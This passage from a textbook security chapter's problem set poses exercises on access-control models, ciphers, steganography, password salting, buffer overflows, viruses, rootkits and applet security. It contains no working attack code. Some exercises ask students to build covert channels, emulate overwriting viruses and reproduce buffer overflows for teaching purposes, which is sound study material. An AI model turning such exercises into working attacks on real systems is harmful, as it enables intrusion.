     cannot be expressed using the UNIX rwx system. Explain this modification.
11.  Suppose there are four security levels, 1, 2 and 3.  Objects        A and B are at level 1, C
     and D are at level 2, and E and F are at level 3. Processes 1 and 2 are at level 1, 3 and
     4 are at level 2, and 5 and 6 are at level 3.  For each of the following operations, spec-
     ify whether they are permissible under Bell-LaPadula model, Biba model, or both.
     (a) Process 1 writes object D
     (b) Process 4 reads object A
     (c) Process 3 reads object C
     (d) Process 3 writes object C
     (e) Process 2 reads object D
     (f) Process 5 writes object F
     (g) Process 6 reads object E
     (h) Process 4 write object E
     (i) Process 3 reads object F
12.  In the Amoeba scheme for protecting capabilities, a user can ask the server to produce
     a new capability with fewer rights, which can then be given to a friend. What happens
     if the friend asks the server to remove even more rights so that the friend can give it to
     someone else?
13.  In Fig. 9-11, there is no arrow from process B to object 1. Would such an arrow be al-
     lowed? If not, what rule would it violate?
14.  If process-to-process messages were allowed in Fig. 9-11, what rules would apply to
     them?  For process B in particular, to which processes could it send messages and
     which not?
15.  Consider the steganographic system of Fig. 9-14.     Each pixel can be represented in a
     color space by a point in the three-dimensional system with axes for the R, G, and B
     values. Using this space, explain what happens to the color resolution when steganog-
     raphy is employed as it is in this figure.
16.  Break the following monoalphabetic cipher. The plaintext, consisting of letters only, is
     a well-known excerpt from a poem by Lewis Carroll.
     kfd ktbd fzm eubd kfd pzyiom mztx ku kzyg ur bzha kfthcm
     ur mfudm zhx mftnm zhx mdzythc pzq ur ezsszcdm zhx gthcm
     zhx pfa kfd mdz tm sutythc fuk zhx pfdkfdi ntcm fzld pthcm
     sok pztk z stk kfd uamkdim eitdx sdruid pd fzld uoi efzk
     rui mubd ur om zid uok ur sidzkf zhx zyy ur om zid rzk
     hu foiia mztx kfd ezindhkdi kfda kfzhgdx ftb boef rui kfzk
17.  Consider a secret-key cipher that has a 26  26 matrix with the columns headed by
     ABC ... Z and the rows also named ABC ... Z. Plaintext is encrypted two characters at a
     time. The first character is the column; the second is the row.     The cell formed by the
     intersection of the row and column contains two ciphertext characters. What constraint
     must the matrix adhere to and how many keys are there?
18.  Consider the following way to encrypt a file. The encryption algorithm uses two n-byte
     arrays, A and B.  The first n bytes are read from the file into A.  Then A[0] is copied to



708                          SECURITY                                             CHAP. 9
     B[i], A[1] is copied to B[ j], A[2] is copied to B[k], etc. After all n bytes are copied to
     the B array, that array is written to the output file and n more bytes are read into A.
     This procedure continues until the entire file has been encrypted. Note that here en-
     cryption is not being done by replacing characters with other ones, but by changing
     their order. How many keys have to be tried to exhaustively search the key space?
     Give an advantage of this scheme over a monoalphabetic substitution cipher.
19.  Secret-key cryptography is more efficient than public-key cryptography, but requires
     the sender and receiver to agree on a key in advance. Suppose that the sender and re-
     ceiver have never met, but there exists a trusted third party that shares a secret key with
     the sender and also shares a (different) secret key with the receiver. How can the sender
     and receiver establish a new shared secret key under these circumstances?
20.  Give a simple example of a mathematical function that to a first approximation will do
     as a one-way function.
21.  Suppose that two strangers A and B want to communicate with each other using secret-
     key cryptography, but do not share a key. Suppose both of them trust a third party C
     whose public key is well known. How can the two strangers establish a new shared
     secret key under these circumstances?
22.  As Internet cafes become more widespread, people are going to want ways of going to
     one anywhere in the world and conducting business there. Describe a way to produce
     signed documents from one using a smart card (assume that all the computers are
     equipped with smart-card readers). Is your scheme secure?
23.  Natural-language text in ASCII can be compressed by at least 50% using various com-
     pression algorithms. Using this knowledge, what is the steganographic carrying capaci-
     ty for ASCII text (in bytes) of a 1600  1200 image stored using the low-order bits of
     each pixel? How much is the image size increased by the use of this technique (assum-
     ing no encryption or no expansion due to encryption)?            What is the efficiency of the
     scheme, that is, its payload/(bytes transmitted)?
24.  Suppose that a tightly knit group of political dissidents living in a repressive country
     are using steganography to send out messages to the world about conditions in their
     country. The government is aware of this and is fighting them by sending out bogus
     images containing false steganographic messages. How can the dissidents try to help
     people tell the real messages from the false ones?
25.  Go to www.cs.vu.nl/ ast and click on covered writing link. Follow the instructions to
     extract the plays. Answer the following questions:
     (a) What are the sizes of the original-zebras and zebras files?
     (b) What plays are secretly stored in the zebras file?
     (c) How many bytes are secretly stored in the zebras file?
26.  Not having the computer echo the password is safer than having it echo an asterisk for
     each character typed, since the latter discloses the password length to anyone nearby
     who can see the screen. Assuming that passwords consist of upper and lowercase let-
     ters and digits only, and that passwords must be a minimum of five characters and a
     maximum of eight characters, how much safer is not displaying anything?



CHAP. 9                                     PROBLEMS                                            709
27.  After getting your degree, you apply for a job as director of a large university computer
     center that has just put its ancient mainframe system out to pasture and switched over
     to a large LAN server running UNIX.          You get the job. Fifteen minutes after you start
     work, your assistant bursts into your office screaming: ``Some students have discover-
     ed the algorithm we use for encrypting passwords and posted it on the Internet.'' What
     should you do?
28.  The Morris-Thompson protection scheme with n-bit random numbers (salt) was de-
     signed to make it difficult for an intruder to discover a large number of passwords by
     encrypting common strings in advance. Does the scheme also offer protection against a
     student user who is trying to guess the superuser password on his machine?            Assume
     the password file is available for reading.
29.  Suppose the password file of a system is available to a cracker. How much extra time
     does the cracker need to crack all passwords if the system is using the Morris-Thomp-
     son protection scheme with n-bit salt versus if the system is not using this scheme?
30.  Name three characteristics that a good biometric indicator must have in order to be
     useful as a login authenticator.
31.  Authentication  mechanisms        are  divided  into  three  categories:  Something   the  user
     knows, something the user has, and something the user is.    Imagine an authentication
     system that uses a combination of these three categories. For example, it first asks the
     user to enter a login and password, then insert a plastic card (with magnetic strip) and
     enter a PIN, and finally provide fingerprints. Can you think of two drawbacks of this
     design?
32.  A computer science department has a large collection of UNIX machines on its local
     network. Users on any machine can issue a command of the form
     rexec machine4 who
     and have the command executed on machine4, without having the user log in on the re-
     mote machine. This feature is implemented by having the user's kernel send the com-
     mand and his UID to the remote machine.         Is this scheme secure if the kernels are all
     trustworthy?  What if some of the machines are students' personal computers, with no
     protection?
33.  Lamport's one-time password scheme uses the passwords in reverse order. Would it not
     be simpler to use f (s) the first time, f (f(s)) the second time, and so on?
34.  Is there any feasible way to use the MMU hardware to prevent the kind of overflow at-
     tack shown in Fig. 9-21? Explain why or why not.
35.  Describe how stack canaries work and how they can be circumvented by the attackers.
36.  The TOCTOU attack exploits race condition between the attacker and the victim.             One
     way to prevent race conditions is make file system accesses transactions. Explain how
     this approach might work and what problems might arise?
37.  Name a C compiler feature that could eliminate a large number of security holes. Why
     is it not more widely implemented?



710                                      SECURITY                                   CHAP. 9
38.  Can the Trojan-horse attack work in a system protected by capabilities?
39.  When a file is removed, its blocks are generally put back on the free list, but they are
     not erased.    Do you think it would be a good idea to have the operating system erase
     each block before releasing it? Consider both security and performance factors in your
     answer, and explain the effect of each.
40.  How can a parasitic virus (a) ensure that it will be executed before its host program,
     and (b) pass control back to its host after doing whatever it does?
41.  Some operating systems require that disk partitions must start at the beginning of a
     track. How does this make life easier for a boot-sector virus?
42.  Change the program of Fig. 9-28 so that it finds all the C programs instead of all the
     executable files.
43.  The virus in Fig. 9-33(d) is encrypted. How can the dedicated scientists at the antivirus
     lab tell which part of the file is the key so that they can decrypt the virus and reverse
     engineer it? What can Virgil do to make their job a lot harder?
44.  The virus of Fig. 9-33(c) has both a compressor and a decompressor. The decompres-
     sor is needed to expand and run the compressed executable program. What is the com-
     pressor for?
45.  Name one disadvantage of a polymorphic encrypting virus from the point of view of the
     virus writer.
46.  Often one sees the following instructions for recovering from a virus attack:
     1. Boot the infected system.
     2. Back up all files to an external medium.
     3. Run fdisk (or a similar program) to format the disk.
     4. Reinstall the operating system from the original CD-ROM.
     5. Reload the files from the external medium.
     Name two serious errors in these instructions.
47.  Are companion viruses (viruses that do not modify any existing files) possible in
     UNIX? If so, how? If not, why not?
48.  Self-extracting archives, which contain one or more compressed files packaged with an
     extraction program, are frequently used to deliver programs or program updates. Dis-
     cuss the security implications of this technique.
49.  Why are rookits extremely difficult or almost impossible to detect as opposed to
     viruses and worms?
50.  Could a machine infected with a rootkit be restored to good health by simply rolling
     back the software state to a previously stored system restore point?
51.  Discuss the possibility of writing a program that takes another program as input and
     determines if that program contains a virus.



CHAP. 9                                  PROBLEMS                                     711
52.  Section 9.10.1 describes a set of firewall rules that limit outside access to only three
     services. Describe another set of rules that you can add to this firewall to further
     restrict access to these services.
53.  On some machines, the SHR instruction used in Fig. 9-38(b) fills the unused bits with
     zeros; on others the sign bit is extended to the right. For the correctness of Fig. 9-38(b),
     does it matter which kind of shift instruction is used? If so, which is better?
54.  To verify that an applet has been signed by a trusted vendor, the applet vendor may in-
     clude a certificate signed by a trusted third party that contains its public key. However,
     to read the certificate, the user needs the trusted third party's public key. This could be
     provided by a trusted fourth party, but then the user needs that public key.     It appears
     that there is no way to bootstrap the verification system, yet existing browsers use it.
     How could it work?
55.  Describe three features that make Java a better programming language than C to write
     secure programs.
56.  Assume that your system is using JDK 1.2. Show the rules (similar to those in Figure
     9-40) you will use to allow an applet from www.appletsRus.com to run on your ma-
     chine. This applet may download additional files from www.appletsRus.com, read/write
     files in /usr/tmp/, and also read files from /usr/me/appletdir.
57.  How are applets different from applications? How does this difference relate to secu-
     rity?
58.  Write a pair of programs, in C or as shell scripts, to send and receive a message by a
     covert channel on a UNIX system.    (Hint: A permission bit can be seen even when a
     file is otherwise inaccessible, and the sleep command or system call is guaranteed to
     delay for a fixed time, set by its argument.) Measure the data rate on an idle system.
     Then create an artificially heavy load by starting up numerous different background
     processes and measure the data rate again.
59.  Several UNIX systems use the DES algorithm for encrypting passwords.             These sys-
     tems typically apply DES 25 times in a row to obtain the encrypted password.     Down-
     load an implementation of DES from the Internet and write a program that encrypts a
     password and checks if a password is valid for such a system. Generate a list of 10 en-
     crypted passwords using the Morris-Thomson protection scheme.    Use 16-bit salt for
     your program.
60.  Suppose a system uses ACLs to maintain its protection matrix.    Write a set of man-
     agement functions to manage the ACLs when (1) a new object is created; (2) an object
     is deleted; (3) a new domain is created; (4) a domain is deleted; (5) new access rights
     (a combination of r, w, x) are granted to a domain to access an object; (6) existing ac-
     cess rights of a domain to access an object are revoked; (7) new access rights are grant-
     ed to all domains to access an object; (8) access rights to access an object are revoked
     from all domains.
61.  Implement the program code outlined in Sec. 9.7.1 to see what happens when there is
     buffer overflow. Experiment with different string sizes.



712                      SECURITY               CHAP. 9
62.  Write a program that emulates overwriting viruses outlined in Sec. 9.9.2 under the
     heading ``Executable Program Viruses''.    Choose an existing executable file that you
     know can be overwritten without any harm.  For the virus binary, choose any harmless
     executable binary.
